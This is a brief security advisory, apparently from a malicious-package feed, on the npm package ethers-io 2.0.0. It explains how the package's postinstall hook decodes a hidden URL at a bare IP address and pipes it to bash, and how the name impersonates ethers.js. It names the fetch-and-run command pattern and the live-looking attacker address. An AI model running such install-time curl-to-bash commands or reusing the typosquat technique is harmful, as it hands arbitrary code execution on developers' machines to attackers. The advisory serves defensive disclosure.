ethers-io @2.0.0

Summary

The package's package.json declares a postinstall script that base64-decodes a hidden URL ( http://8.217.75.147:3000/payload ) and pipes the HTTP response directly to bash via curl -s <url> | bash . On every npm install , arbitrary attacker-controlled shell code is fetched over plain HTTP from a bare IPv4 address and executed on the installer's machine with no TLS, no integrity verification, and fully mutable content. Multiple independent block signals stack: obfuscated URL in a lifecycle hook, curl-pipe-bash, bare-IP plaintext C2, and purpose mismatch with the package's stated function. The package name ethers-io and its stated purpose as "I/O utilities for ethers.js" additionally impersonate the well-known ethers.js ecosystem, with the repository pointing at github.com/ethers-utils/ethers-io rather than the genuine ethers.js organization — a typosquat lure wrapped around the install-time RCE.

Source: amazon-inspector (098acd1dccfed8bcaea9f56206745eef7c9e4cd368599ba23f762a84c86bbc14)